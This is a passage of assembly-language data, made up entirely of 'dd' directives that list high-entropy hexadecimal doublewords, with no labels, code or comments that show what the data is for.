dd 33307834h, 0B95AF187h, 42D07737h, 99D02F9Eh, 85E395F8h
dd 0E9280265h, 7752A817h, 0DCEE0164h, 0BCFDFC10h, 0D7E8C54Dh
dd 66F1FD6Bh, 0D37899B0h, 0CE029F2Eh, 0C0A5F0A1h, 4852DD8Ch
dd 0E140D7DCh, 0BCC574EBh, 0CFE3CA6Ch, 0A9D69B9Eh, 42F8E09Dh
dd 47B1CB0Eh, 22ED1C54h, 0ABBE1DBCh, 44B7A04h, 90F25838h
dd 87C95748h, 149D62CEh, 0E0BAF087h, 904F3EE9h, 1A7BA675h
dd 38ECD72h, 172D2FF1h, 0A4466A97h, 62FC1D7Dh, 5B79F35Ah
dd 0B8AA8975h, 6161EAADh, 68E7C6EFh, 6570A03h, 15CC36CDh
dd 0CDD77FBh, 0D968145Dh, 0D3D28669h, 556E76DBh, 35504FD4h
dd 836D85AFh, 5FA94C8Fh, 83875632h, 0B2A66075h, 5FA14E16h
dd 2565365Fh, 9C94F3D9h, 542D373Eh, 0DEBCE0FAh, 0C727BAF3h
dd 489B661Bh, 54F946ADh, 0F145D71Eh, 5AFF2F6Fh, 44D7F891h
dd 0A98EF0D1h, 4376F930h, 3FD83D3Eh, 6CB26A77h, 234EF38Ah
dd 7C244BA5h, 65F4757Ah, 5D16F2B7h, 4A299CBBh, 0E73E91E1h
dd 0E0F0E3EBh, 31DF8995h, 9153Dh, 2A57F455h, 6D06F3DEh
dd 2AD57F03h, 0F79978E2h, 1192FE78h, 0E55FE9D4h, 0E0F1E366h
dd 0B9F22894h, 0CB3411B4h, 29B3EFDDh, 0CFC9F9Bh, 5D3A3177h
dd 41C39767h, 8A50DBF4h, 5E4CB613h, 36CD4D3Ah, 0EED3C9AFh
dd 9F7DFA15h, 97421651h, 34B7D7B0h, 0CFA0FB77h, 0E1585E08h
dd 9F280A61h, 0A67BE5A7h, 4C7CF6A6h, 2B987FBBh, 0B04D70B5h
dd 0B9697E55h, 8DEF33A8h, 15D6F2Ah, 0EB33362Dh, 0EDBB77BDh
dd 428198FCh, 0D3D2B6DAh, 154698B6h, 0AB091F94h, 2AA79857h
dd 0C85A0CA5h, 0E949FAE5h, 3601F532h, 5FD06EAFh, 0BEB16263h
dd 27B47754h, 0B16DA0A6h, 0E2F7895Bh, 0BC631D4Ah, 0CC4AC52Ah
dd 0CD995FC6h, 0A5975E6Bh, 3DF04F97h, 11C012B0h, 0AF3DB63Ah
dd 0C74875D2h, 851CE38Dh, 0BEB9803Bh, 69B67264h, 39903A74h
dd 0E5DFCC2Bh, 0AB91B352h, 373F85DFh, 1DD15526h, 0B3D80861h
dd 434E94BAh, 0BC8E99DEh, 3BDEC8AAh, 0F05F7DADh, 581FC65Ah
dd 1566AA01h, 6D9272F9h, 0FE5A3F2Fh, 0C88DCCDCh, 3A8A778Bh
dd 33FE89E2h, 60EF4F5Ch, 5D23CF90h, 0CC2CA85Bh, 0BEFF1DAAh
dd 1CEB4D16h, 0E8E50D54h, 8C43F0FAh, 9A1A9D95h, 0F7F0FFA7h
dd 58B2C90Ah, 85AE16DFh, 47DE7A82h, 4B5B074h, 2C799585h
dd 0DAE984C5h, 0C6307C08h, 2169C00Ah, 0DA303491h, 9F9963F8h
dd 6E82A9A1h, 75B0A705h, 1950B406h, 5F26FB86h, 0FF9F16DFh
dd 0F12B5A4Eh, 0C5FD207Eh, 0AC0F1645h, 0B294D2CDh, 0F555EB74h
dd 0AD78548Eh, 473B337Bh, 0FB9FC0C1h, 47559B1Fh, 0C8CFF86Ch
dd 0C95F40B2h, 2CBFB05Ah, 72B0333Fh, 9AB8F498h, 277DB96Eh
dd 342F027Ah, 992ADBEBh, 0C0B6BAEFh, 65A3A5C3h, 7DE4CE31h
dd 0DCFAE42Dh, 0D5005307h, 3D5D50DCh, 5121380Bh, 97F7F765h
dd 0FC1CB37h, 8040EEB6h, 0AC2CDF9h, 190EBC95h, 58EC27Eh
dd 34227DF0h, 4DD8D797h, 0F1CC1550h, 0E5C5CFD4h, 2B24153Eh
dd 54490F36h, 967D35DFh, 17E36B8Ah, 50BDCE16h, 0B6DA701Ch
dd 9CF91207h, 0FD119BC6h, 0B621C4F5h, 24561D81h, 0E155B578h
dd 7C18D068h, 0D55879A7h, 9D17E553h, 986AF58Ch, 0DEF3DDE6h
dd 2247DDC5h, 9E055F8Ch, 6703EDABh, 0ECBBD75Eh, 0F35703Eh
dd 0E4C8E67Fh, 5B44C6C7h, 4CA52AD5h, 4443D1CAh, 0C07179F3h
dd 5F2EE75Dh, 2B8AABE9h, 8978B7D3h, 0DB70A8DCh, 33380FC8h
dd 56DCFBAEh, 7A5893C8h, 0D41EDCCDh, 0D64A9A84h, 27287082h
dd 9F0327E3h, 188D4AB9h, 0E66D17EBh, 36F26CAEh, 349F2B3Fh
dd 0AB74B0C9h, 0ACECF764h, 8968213Fh, 7E0F42D3h, 959E816Fh
dd 0FBEAE02Ch, 0BB68B3BEh, 0C3DDBFE8h, 60783B1Eh, 0B1C28FC1h
dd 7C7FA5A1h, 974F0DECh, 9DD74DFh, 87968F3Eh, 57C78786h
dd 97F97120h, 0D8E8A3B8h, 8C93FEB4h, 3F1984C9h, 8E3CD9DAh
dd 9EF44987h, 0BBEF8BE1h, 0CCD5672Ah, 870B55C9h, 165DD1DAh
dd 0ABAF4FA0h, 2CF128FCh, 3FBF4D7Eh, 2841D15Ch, 4D69C415h
dd 54204D66h, 3663DBC4h, 0F62D1DA7h, 5594D3D7h, 0B450D898h
dd 74BF8BB5h, 3D6530E1h, 832C5C5Ah, 3EBEF077h, 0DADC21E7h
dd 0B51DA020h, 0C3FF96D9h, 0F4C88DAh, 255C9063h, 0DC4BE1F8h
dd 5E873D0Ch, 0F574102h, 832A9677h, 0F2A1C1F3h, 4157544Ah
dd 0B8110789h, 69ECD47Bh, 944D3CF3h, 7B8DE562h, 0ECC5DF8Fh
dd 0F20F94FDh, 0BECAB792h, 5AAE67B5h, 0DB6A568Ch, 0A44D84ECh
dd 6CF3A5FDh, 5E7BE74Ah, 2418137Ah, 0B5E5ECFBh, 9597ACCCh
dd 0D5D1F337h, 3FDB0CE4h, 0BF86D592h, 83F78732h, 0E93F53A5h
dd 0AE3C77A0h, 2A6BB00Ah, 5CE6402Bh, 0EAF2A538h, 0EDB7CD89h
dd 0F65A2AABh, 0AB58A66Fh, 48EBDB9Dh, 0B55E67B0h, 5B05FE94h
dd 602DDCCFh, 9DC64303h, 0F7D7EF74h, 1FB57EFAh, 0A208991Bh
dd 2E2F9403h, 0B63A970Eh, 1F8DE12Eh, 0A5BB6272h, 0E389D556h
dd 0A6257D3Ch, 0F1671CFh, 2BA004DDh, 0ED383C2h, 8CBBA902h
dd 9FC5153Ah, 0D5A92EBAh, 1B35A3DFh, 80D2CB15h, 0A34C9FA3h
dd 805A3B9Eh, 98ACFC6Bh, 96133332h, 0B88AAF0Ch, 120793DAh
dd 0D3911DCDh, 0CD8F350Fh, 0D2E07AD5h, 5D4DF612h, 2E905D78h
dd 0D1FDFA9Ch, 1F5C0CF3h, 8DD1A90Ch, 3F0C6D54h, 56140E38h
dd 391F5F22h, 94093C7Dh, 18A241F1h, 7FBEA17Fh, 85EF15EBh
dd 174E06C3h, 0F2EACAAh, 8AED628Dh, 0ABE13D0h, 0A4C94A82h
dd 7025EBEDh, 9FD9ADE4h, 0CF8ABB4Fh, 3464E6E3h, 0E553B46Dh
dd 39DFD73Eh, 0EE22AF43h, 94DEEF9Ah, 84A2B5F8h, 481270F9h
dd 95739AAFh, 0EB787535h, 7AFEACD7h, 52A347D5h, 13E8EDh
dd 725A26B5h, 0B5115BABh, 5F98F297h, 5880940h, 1537F24Ah
dd 0D1A2C303h, 3CCE8AFFh, 972A4764h, 4D16DE0Fh, 0AAB2BB5h
dd 711B0B18h, 0E13B8208h, 0EFF6A304h, 0E67AA0Ah, 9A93E0D9h
dd 551E2C6Dh, 0A2DB3A12h, 7E0628DFh, 8A3135E1h, 0BB1796BDh
dd 0B4F35E5Fh, 0D386C76Fh, 0A86A779Bh, 8C4E9680h, 91AAD8Ch
dd 0B57E9AA9h, 0FD671067h, 7535BA57h, 47761E47h, 0B469CC0Fh
dd 0BAA23DEDh, 46EF5E80h, 0B2A6ED58h, 26E2E1Ah, 0F83F6129h
dd 3E5067D6h, 0EA14D333h, 0F8646E9Ch, 0E966E38Dh, 1E91AB55h
dd 0D39B09CFh, 3FD6B5A6h, 82AF5D90h, 9AC6010Ch, 8E23E97Ah
dd 4CEE2936h, 1DE778DFh, 0C2A67FD3h, 0F87DB95Bh, 4F20042Ah
dd 0AABB762Dh, 0FFD1F0C8h, 9591CD7Eh, 0AB52DC6Fh, 1FFBB1F8h
dd 3BDE597Fh, 30797747h, 553CAE75h, 0D33B0C8Eh, 1BF30998h
dd 5A8F6D81h, 0FCF739DDh, 0AE12D0D7h, 0D4E72A83h, 7FEF37C9h
dd 0E2A171E3h, 0BED2FF25h, 5CCE547h, 911F065Fh, 140DB90Fh
dd 3CA57595h, 5B8EF198h, 0EBD494DEh, 85AA92AEh, 0D2F7F7FCh
dd 0D986EF7Eh, 2A3CF035h
dd 0A8F31554h, 5048A4E5h, 0DF44E403h, 8F63BDB7h, 7626F81Eh
dd 1623E316h, 0A7B8EF92h, 65FA788Bh, 0D5AD18DCh, 8FD26C07h
dd 0A6B2AA2Bh, 92B84C7Ah, 80FB7B5Eh, 8C5CAAC5h, 933AAB8Ch
dd 279BC169h, 9FAC7A95h, 0D9EBBCD6h, 4D6EDEA7h, 71FC8C3Bh
dd 981DED56h, 0F2B0183Eh, 0F3A0903h, 6CD4E6C7h, 0A1F8CDB4h
dd 0C8702B3Ch, 1F31BC3Bh, 5726865Ah, 0EFD6D9E3h, 3CD94766h
dd 0E5C38FEFh, 27BFF77Dh, 1FAEB55Dh, 4D4A13F9h, 0D228C47Ch
dd 743E79A5h, 3D4043F6h, 0E67A5FA8h, 0D3FEB2EEh, 0C34984D2h
dd 388178DAh, 0B8F04731h, 95977A72h, 0EBDF108Fh, 6CE09C82h
dd 0FF0F36CAh, 0F10AB45Fh, 0A7AF950Dh, 0A8AC2E66h, 200AE9B1h
dd 40834736h, 0AB7BACFDh, 4751B28Ah, 78152A23h, 0AE6035B0h
dd 6C3D053Fh, 704E9F07h, 0ADE5D05Bh, 9516DA83h, 2A19AC59h
dd 50FDAE57h, 0D2CA5AD4h, 313E1404h, 0B2B0EDFh, 5DD2B2F3h
dd 79FCCA6Ch, 0CBF9B0D5h, 155316DDh, 66963E36h, 6AF359C1h
dd 0E3C7267Eh, 0B5838E93h, 0AB8589E0h, 0D4C6FBA0h, 3B51B32Fh
dd 0DA961BB8h, 29381CD2h, 5F4EA615h, 7ECEAE1Dh, 0B87E0B2Fh
dd 0E41B74Eh, 0F0238D8h, 64F6DF1Fh, 0DF02CF5Ah, 0B873D5E4h
dd 0E4FC764Dh, 0B4139F43h, 2322DD9Fh, 6802D3BEh, 143F6634h
dd 5B295D07h, 73991DFAh, 0B11D730Eh, 5DB7D375h, 74E1AB30h
dd 92C55C26h, 0B51D1F67h, 12465CCFh, 4E41592Fh, 69069F15h
dd 0BE1F89E6h, 0CF94EFA3h, 5813126Eh, 0E4AE1097h, 4774BEE1h
dd 0B248AF57h, 2C3D6F03h, 0F396F6FDh, 0ED6E70E0h, 8A0315DAh
dd 1F0290E1h, 0EDD17D5Ah, 675A222h, 0E6EB4F87h, 49D6C7A2h
dd 75E12E44h, 0D58B7B7Ch, 0A74525B5h, 0C8E21EB6h, 0FF4AE7A0h
dd 21A977F5h, 40C309CFh, 46A25333h, 0ABC13616h, 0EB68A8D6h
dd 0BA1647E7h, 0D291EB8Eh, 4E54B929h, 0BE48A44Dh, 29B7A966h
dd 2A751E1h, 7B5550DCh, 9945EF52h, 6E1381Bh, 946B8C25h
dd 48165A25h, 0B9592AFDh, 4966B3EEh, 0ABB4BA64h, 65D87573h
dd 12FC525Dh, 4263E248h, 0EF94BFBFh, 8D4B8B54h, 8BF3E555h
dd 739260FCh, 0C5BB8282h, 0B0C146BDh, 7822A84Ah, 6318BFCAh
dd 13FF75D7h, 0E495AF86h, 0BF8349C0h, 88AEF829h, 5B38CA13h
dd 9F2E4A88h, 2CF5FC3Fh, 9EACCF7Fh, 6D2F2FCAh, 0A95FA17Ch
dd 60CCE193h, 0F14A1555h, 0B2B15738h, 91764BEEh, 0F2D717B3h
dd 86ABF7D1h, 0AEDAA33Eh, 2E00C371h, 0BD8F644Dh, 5F385B89h
dd 0BA168555h, 67E00B72h, 0FA33980Fh, 0A679EC93h, 9303724Ah
dd 0B4712EF5h, 655B743Dh, 46C6ED6Eh, 25FD35ECh, 7EBDF0C6h
dd 0A7CF17B0h, 597DB213h, 0BF9BE1CAh, 0D725EB3Dh, 830F0256h
dd 2C6F2540h, 0F4A3FD1h, 278E708Dh, 9BAACED7h, 68DBE35Eh
dd 55E4B2D1h, 1EA15726h, 35875603h, 0BD1B9936h, 0ABECA2D1h
dd 0A92992C6h, 0BAB8156Dh, 38599B46h, 0BBC25398h, 0C9F0D56h
dd 0EF72849Eh, 975B97AFh, 0FDBBDDE9h, 0F095CD15h, 0F0D53E50h
dd 0BC0FAF29h, 0A1BBDF4Bh, 0F2F7939Ch, 0DF84BF0Fh, 0E3E3F71Dh
dd 571CE83Eh, 722AFA4Dh, 0D3C9AA93h, 0C1EE0D89h, 4B68CFB2h
dd 0ADA2438Fh, 4D26D07h, 12140496h, 2C27DED6h, 5CD6B715h
dd 548BB502h, 7CC5625Bh, 8276EA45h, 5D17F2D8h, 998ED77h
dd 410C0F9Eh, 0ED5BACDEh, 5DFC06EDh, 6F99DF37h, 0B2A2ABB3h
dd 2257E9C3h, 59393F48h, 0A27A10B2h, 0F4D558E7h, 0AC9A8079h
dd 5F69A495h, 6AB41985h, 611A7720h, 0FBF5E34h, 0E62FEF9Eh
dd 1A35F7A4h, 0CA95A2BBh, 0CC7E5D7h, 58E0EB52h, 3E96A79Ah
dd 0EA7AAAB4h, 3A96BBD2h, 0F25DB4C4h, 2BAD6F57h, 5A7CD15Eh
dd 965769D5h, 99AD4ACFh, 77EFDA6Ah, 4307789Eh, 0B2612C9h
dd 9505FF6Ch, 0A977829Eh, 68DBF1A2h, 4A878112h, 0AD4636BBh
dd 59022C67h, 926302B4h, 6F669D9Bh, 0CA81B6DFh, 35607DB8h
dd 69969471h, 388B0E95h, 7B472A1Eh, 72782F5Eh, 3372BBD6h
dd 3BCCFE61h, 9BDB9C8Bh, 2AAF9F14h, 8112B793h, 746C4A17h
dd 19AAED3Dh, 0D1EDC3C5h, 0DD546A0h, 0C0611EE8h, 0FEB48363h
dd 0D4AD25AAh, 6F94E6DEh, 0DABE7341h, 288EAB65h, 0A18EA5A3h
dd 0E5AA02BFh, 0EE85AB48h, 0DAAB4636h, 0D632FEC2h, 6AD7C79Ah
dd 1BF7B9E0h, 0F3DD34EAh, 0FDA3B39Eh, 0DC65703Dh, 8359277Ch
dd 554C27CDh, 0A4C9050Bh, 0A2E0C9BEh, 8E7971E3h, 0D12FC75Fh
dd 7F353CE5h, 0A3157486h, 2BDD763Eh, 0F581E140h, 0E77BFC6Ah
dd 0DE4DB397h, 0A9686860h, 93B5378Fh, 7CEBC862h, 0CE333867h
dd 3E69DCA4h, 57B7445h, 0DF362B45h, 3B6DF489h, 2F291D48h
dd 3C4E180Bh, 38DBC34Dh, 996BE8FFh, 0ECF812B7h, 0B9E9B824h
dd 6371EEACh, 18D59E33h, 0C615AEA3h, 0BAE3D633h, 0AEF7B272h
dd 0F0981E47h, 97F39EFAh, 17F446C9h, 0F0A7F0FCh, 442BF61Dh
dd 7D2D2DA3h, 9309A9C9h, 1DC2C4DAh, 0C9786497h, 419B03FBh
dd 0A3D96DD7h, 51748CC9h, 0C4BC95CDh, 6372A768h, 0ADCAEC76h
dd 279A6A3Dh, 3577619Bh, 0C190DC3Dh, 8842306Bh, 0FCB093BAh
dd 89B1BEB0h, 631D7100h, 9E9177D8h, 0CDAB56EBh, 96E5DCB7h
dd 0EF053703h, 0D3A4756Dh, 0E11D749h, 62DFF55Fh, 0F8BC413Bh
dd 7CB04AE3h, 3223719Fh, 5FA858B9h, 0B50CC93Eh, 0DEB2A221h
dd 0F2B9619Dh, 0D6D99D5Ch, 3F95EB66h, 0EE78C7A3h, 7E5994Fh
dd 9FF68DE9h, 0FC694423h, 0F506F667h, 0D33592F8h, 9AAD8552h
dd 6D30FC3Ch, 0E7E626F9h, 3C63EB30h, 8A1D1EC0h, 19A8DA26h
dd 8BF78B14h, 0C143C9EFh, 1BF614DAh, 0DD7F860Dh, 0ADF36A2h
dd 0B069F5B9h, 2A560C36h, 0ECDB1398h, 0BD6749CBh, 700C7ECFh
dd 51138EDCh, 4AE4A188h, 0AB561BBCh, 6C9798BBh, 0B7423AA0h
dd 63789705h, 2CAFEE1Fh, 80933D06h, 0DBCE12BFh, 9A8DE0BEh
dd 57BBD997h, 29CD851Fh, 1E95330Ch, 0D9A5A2BBh, 50F1B83Fh
dd 165DED03h, 0D633781Dh, 0F482E4AEh, 98F98B8Dh, 80AD134Ch
dd 2C3BCA58h, 217877E9h, 51AF98CCh, 5BBBC88Bh, 58647419h
dd 779832Ch, 0D50AE39Bh, 0D6A2757Bh, 965E4F32h, 47B89963h
dd 78C0BCB3h, 0B91BFABEh, 68557B45h, 0CF05CAA0h, 0BFDF2D99h
dd 0B5F0ECCAh, 179812CBh, 0B81737C1h, 0A3DC84CFh, 0AD7705F3h
dd 0EFCFB47Ah, 9D5C804Fh, 2C6D6380h, 0ACE91B9Fh, 14C0FF49h
dd 0C829EF95h, 0D63AF8FFh, 5536F2A8h, 9DFCD22Ah, 5B367A21h
dd 13EB00EEh, 0C613C1F4h, 5270BCBBh, 796A2E2Fh, 796D5DFBh
dd 61967721h, 0F8CE2F71h, 0DCCD6779h, 96D4DB6Dh, 1BAE6F4Bh
dd 1DC1E5C6h, 1A3126ADh, 0FA577A28h, 0DF1FB850h, 70FB28D8h
dd 3AA67572h, 76CB5714h, 800B2AA2h, 0CDC4EC2Fh, 0A62B7196h
dd 0E4A933E0h, 15A67CB1h, 145FABBDh, 0A316DCC2h, 1D16AEA6h
dd 85AD9AA1h, 167FF069h, 9EB62D13h, 3D4029F1h, 256A029Dh
dd 0B5DCEAAh, 0E45CFAA5h, 0A3B9D8Dh, 54D8BA3Ch, 36725E9Bh
dd 51A86AACh, 86E5329h, 0CAF72DD0h, 0D28F4EDBh, 158BA9CFh
dd 0A65226Bh, 0B7DCAAA4h, 411E7D27h, 8539095Ch, 310C1F0Ah
dd 2812BE8Eh, 4A8886A8h, 0AC160EA2h, 0B1DCB15Dh, 0FE0B4DB4h
dd 0CEA23790h, 0A558AD97h, 0F6993DD8h, 5B4157FAh, 31ABF735h
dd 0C433FDDAh, 90E41E6Eh, 0B0FDBE1Ch, 0ED79E6A4h, 7E49E178h
dd 353FEFDh, 0AD8B5EA6h, 7D6AF2EFh, 0D1D3E872h, 0B02EF8AFh
dd 381F845Fh, 0AB4E7717h, 8BAEDFB5h, 5B594CE3h, 5C3176E0h
dd 48F7D625h, 5927206Dh, 0DFDEBD47h, 54F149E6h, 121F88B3h
dd 0C19F1107h, 41DBE1B2h
dd 0FBF0B872h, 5BA6440Bh, 7771AB52h, 0F311F2BFh, 0AAC62DB5h
dd 99F1B03Ch, 0B34539FCh, 9AFF0E1Fh, 0D3C9146Bh, 4CE06156h
dd 0E2B15625h, 1151C898h, 0B2EF7227h, 5AE8FEF6h, 6A802B58h
dd 0CC4EDDBEh, 0EEB9D7E3h, 7A9DE8D9h, 1DDF565Eh, 6234727Dh
dd 0A2D199B5h, 0DE3D0146h, 271955ABh, 1CB4E1A5h, 507843BFh
dd 810ADA2Bh, 280AE770h, 0B4DDDB08h, 4660C973h, 3B9508DAh
dd 0B7C9BDB7h, 61240BEAh, 26B5954Fh, 0F4B3D992h, 0E0D03878h
dd 1E69399Ch, 26B854E4h, 0CBD11927h, 0FED2ED8Ch, 0BACE49CDh
dd 0D6AAB97Eh, 0A3729CB8h, 0B60ED8E8h, 8E4DF87Eh, 4F14AE3Ah
dd 0F9BB7DCDh, 0BFF968D4h, 69C2C3C5h, 0A21EEAE4h, 82622618h
dd 1F8F0F53h, 0FD843ADBh, 0F55790E1h, 4540C4BBh, 0EC2D79E8h
dd 8AE39B74h, 1DFE92EBh, 0A52B3B0Bh, 0ECEEA51Bh, 2FCC840Dh
dd 71F8BB45h, 0A79F30A6h, 2BC5C5ABh, 0ABD7A429h, 1067BBDFh
dd 0D75CC533h, 3E2A3739h, 0F7444EAAh, 686D199Eh, 0C707E333h
dd 0FD018FEFh, 0BEBDDF3Eh, 0C9E00ED5h, 97543594h, 0A131DC49h
dd 8051EF0Eh, 0AC196B38h, 0BFBFB2B5h, 51D898CBh, 3765D2E5h
dd 0F58BFCA2h, 7D5F6AB0h, 5911F1F6h, 1F076F2Fh, 657FCB4Ah
dd 3B135AAAh, 6BE2EC99h, 0FB7F0E2Bh, 0A7DE1F82h, 0DDAA1398h
dd 0BF828606h, 1BE9D2B5h, 0B499B5B7h, 0E13DAABAh, 8765F62Eh
dd 0BD00878Eh, 70D5565Dh, 0CA5E2C10h, 72F6091Ch, 77E2F989h
dd 7AF819FAh, 4F0C353Ch, 78F91DA0h, 0B96D8433h, 0EB450759h
dd 0C49972C9h, 325A37EFh, 0BEA89681h, 0F603A6BBh, 0F55B14DCh
dd 0C29B6ECCh, 0C3F0992Dh, 0BC527E5h, 0CEEB8434h, 13FAE6EEh
dd 0CCBAC896h, 26A10471h, 5DB4FA58h, 7E372FB1h, 5DE11A4Bh
dd 0E8E0E775h, 556E1C1Dh, 4873CDEAh, 0BF55E06Eh, 0D28947CEh
dd 2253FC05h, 0F07C4D06h, 360BDBC8h, 2EDF77E1h, 55E8E0FDh
dd 41745262h, 0D365574Dh, 14D1A891h, 636ABECDh, 0C6C2F8E0h
dd 26038D62h, 51C1E046h, 703C8BADh, 466B5F1Eh, 499D5799h
dd 0A057111Bh, 57A778D5h, 2BDE30A1h, 0FE5C12F5h, 0AB9CB14Eh
dd 0DABD76D7h, 9F7CBBCBh, 8B896766h, 6B595439h, 0BA9C88A6h
dd 0A0AA3BDCh, 0CBEC2D74h, 84B736F7h, 772C584Ch, 370FFC80h
dd 0D99E534Dh, 477E3BFh, 0E5ABFDA8h, 1F888379h, 9E691BBAh
dd 0CD98103Dh, 0AC8BF7D1h, 68361A4Bh, 0FF03A66Ah, 0CAB15B2h
dd 89A62EF9h, 4722B58Bh, 53A1C1B1h, 0FAD13F85h, 2DAF07EDh
dd 0C2A7BD63h, 0F243F13Ch, 0E8A072F6h, 7322F3DDh, 0B6026F7Ah
dd 24A429CFh, 99446A59h, 5A16CF6h, 2CE97F46h, 13B6A7D1h
dd 0F1909CA3h, 72AD12A5h, 0FA49AC12h, 874134ABh, 5A3679DDh
dd 0EE1DD236h, 0F82CF47Bh, 0AAB11D32h, 964987CAh, 3F3287B9h
dd 834FDEA6h, 5A3C506Bh, 0EC581D38h, 1C9A35B6h, 0BA5FF103h
dd 8545D562h, 0DA975215h, 4D4D47A3h, 37725682h, 2B8143FFh
dd 3037BEA4h, 0BD085CFAh, 56198A88h, 44A4CA05h, 0F15D67F3h
dd 0B4E0FBDFh, 479B4944h, 5AC6C0F1h, 0A7B9BD2Ch, 41AA2FACh
dd 0D52BB2B9h, 897C68F9h, 0D77C5A4Ch, 6555DAF8h, 0C2D920EFh
dd 0BF5F650Ah, 0D6778AD5h, 49B4E3BFh, 4EC19B8Dh, 9CBA7A5Dh
dd 0AC15A09Eh, 0A61B51ACh, 0B679F2B6h, 493F45F9h, 33E97E9Fh
dd 2AD18747h, 878FFF17h, 0E0CC73D5h, 689379A7h, 6F282491h
dd 6FB8104Eh, 0D45B49D5h, 0AD66030Dh, 0D8B7AC7Dh, 720D7EBBh
dd 0D1A91975h, 0EA7B63E7h, 50E5408h, 6B620D36h, 991C0F83h
dd 7341AD2Bh, 0E4E8EAD5h, 0C1D82E57h, 9036BF3Bh, 0D43F19DEh
dd 0C02806D5h, 0AE234F26h, 7859A87Bh, 0B5960B46h, 7FF1C5AEh
dd 56032323h, 83DB4A42h, 0F28FAC3Fh, 1C507099h, 47A7BF97h
dd 0F8553694h, 67E8CBCFh, 0BB57A4D4h, 0BDEC444Fh, 0D5EEE0FAh
dd 39FF9D64h, 0CD414B07h, 48CB3465h, 0DD90FE3Ch, 5A6065E1h
dd 4A95912Ch, 51196667h, 17157DCFh, 5BECA929h, 5FF4968Bh
dd 3CDB0763h, 79B49F79h, 3BEA3A9Eh, 0B8AEC6CFh, 0F0030E4Ch
dd 26C39F57h, 0C2C1A76Ah, 0B1E095EAh, 28AC9CA7h, 0E64B7535h
dd 0C3CE8077h, 31E5E32h, 52A3ED5Dh, 0B4C021A6h, 66955D2Ah
dd 0F8E676D1h, 0CFD568ECh, 0ABB43936h, 8A51AA8Dh, 7237397Bh
dd 0C2362952h, 0D713076Dh, 3E815763h, 0A4756EC3h, 13058C4Eh
dd 0D55630EDh, 0E6C656E7h, 85448DC3h, 0F03895DDh, 192978Bh
dd 95F60EF7h, 0A5DDCA55h, 7246ACC5h, 7AABED4Ah, 78F29A5Ch
dd 6D495551h, 0B6C9DEF4h, 12E2E6AAh, 7EBE17CDh, 53EB254Eh
dd 265D2576h, 906A43BAh, 1A65EFFh, 5D5FF959h, 241D5143h
dd 0F8564E63h, 667ED02Fh, 0AE6B4057h, 45024A7Fh, 584B0B38h
dd 12CBD5B7h, 4741CE18h, 0F6DC094Ch, 1C58B637h, 0A5C822EBh
dd 8B46C558h, 703EA86Fh, 8FB7F402h, 0DE940AA4h, 0FBD6F4CFh
dd 6D615E0Ch, 0AB7DD6BCh, 3D4BD2C2h, 0AEB2662Bh, 990C7650h
dd 341D433Ch, 0DC0F1361h, 17F57C1Eh, 36A9D7BEh, 0FBA0968h
dd 0F41BA9C3h, 215399A3h, 0EA966782h, 9D3DD765h, 1695A17Ch
dd 1251995Fh, 0CBEFC089h, 0F2ECD750h, 41B75CD7h, 61A359FAh
dd 74F3B81Ah, 587E20E2h, 0FA66B3B3h, 0D1FCD8E0h, 2A28D688h
dd 255578A9h, 0AB70FC27h, 7F94D98Dh, 687384D2h, 0AFE3A37Dh
dd 60E059A2h, 0EC010707h, 0CD0E039Eh, 5F0E16B8h, 85629A3Ch
dd 0C078C204h, 1522381Fh, 0B72FFBA1h, 0A53CDB69h, 16D52C3Ch
dd 9B9D457Fh, 9D8934FEh, 0A6BBD6C9h, 60909AB5h, 0C8D98ABh
dd 8BB6EC05h, 4FC1EBD8h, 57717128h, 381F37F7h, 0EC57221Fh
dd 188F6437h, 503EB57h, 9DCC84D5h, 0C8CC419Dh, 0CCA4A2FFh
dd 1E5B1685h, 14759F7h, 0C2DFE57h, 17059C3Fh, 89B92297h
dd 34CB536Ah, 42D34FC6h, 0A5A4E562h, 81228BF6h, 5EFC8B70h
dd 7D05289Fh, 56ED4331h, 250C8B4Fh, 49B39BE7h, 116F82FDh
dd 1E08CC0Fh, 167BA2B4h, 3A9A9662h, 90AAF839h, 3F52200Ah
dd 0EBA3EF56h, 2665CE29h, 0F68D6D25h, 0AD765C20h, 0CB261B4Ah
dd 32F7B368h, 0EAC94FACh, 0ACF3732h, 56BAE5B2h, 0D2AF92ACh
dd 0AFA7DB69h, 3556D89h, 55FBAAB0h, 0EA439B35h, 78B470B0h
dd 0EA2F375Fh, 0C8FEF702h, 4437219Ch, 0AAA8D8A5h, 0FEEF9C8Dh
dd 9A50CCB0h, 5EE3B915h, 0C576EB66h, 42529D71h, 6B965771h
dd 0AE5DDA96h, 0AC51964Eh, 3BBD08C3h, 0D794DCC2h, 0E44B3AEDh
dd 0E4DC2EFCh, 0CDDA1E7Dh, 6FA30F5Ah, 8A23772Fh, 4EAF76DEh
dd 6D498E34h, 3F1DB7C8h, 895F75FCh, 543A374Fh, 0A4995C98h
dd 9555951Bh, 0BB30DD73h, 0F83B38BAh, 0EE747377h, 7032F67Eh
dd 0CB7BD5EBh, 0D873DA30h, 0BB52237h, 94FC488Bh, 0E1A5BED0h
dd 43F038F5h, 0CAB2AB8Bh, 3C5247F3h, 0E4B5E145h, 86D6C18Ah
dd 759BFB9Ch, 0BC76CD7Dh, 0B23B0554h, 0DA486BECh, 0F8DD5362h
dd 756FF52Ch, 0EEDB1EDBh, 895796B6h, 495FBE51h, 0FC3F438Eh
dd 0EA26523Eh, 0F0D64A0h, 0A592FD2Fh, 0FCAB9BF4h, 0D211AF89h
dd 0DA23D356h, 8E6FF1FCh, 0FCB2184h, 0B253F83Ch, 28AAAD67h
dd 50014B45h, 0FE8D9D71h, 0F65CE12Ah, 95DF3558h, 0B87E46AEh
dd 5947B069h, 3F931BE7h, 5FD056DAh, 5F6D138Ch, 0FD2A9EFAh
dd 381CA92Eh, 0C62C87DFh, 0B1FFFCC8h, 0D666155Eh, 6C60859Eh
dd 0C6570E45h, 0B468C283h, 360F6765h, 2FFB844Ah, 7FCE4055h
dd 6E908E7Fh, 6F183D8Dh, 0A3976955h, 0B959559Dh, 531D33C0h
dd 0FF8952A5h, 0DF302DF8h, 0ECC11AE3h, 0EA789195h, 6E572A2Bh
dd 0BE72278Ah, 0C981E564h
dd 0F5F9BE73h, 5B9C3AE7h, 73305FD5h, 0A6D05BD5h, 4A73BBB0h
dd 0E5DE1772h, 0EE50B0E6h, 4DB17128h, 0BC4F58Eh, 0FFC1F32Ch
dd 49ACA3Fh, 0D4BC08Fh, 0E5F39DABh, 0EAA3156Ch, 2C99AC06h
dd 43BE0FD3h, 0A962CB2Ah, 25B2F6EFh, 0D39C655Ch, 38AA934Fh
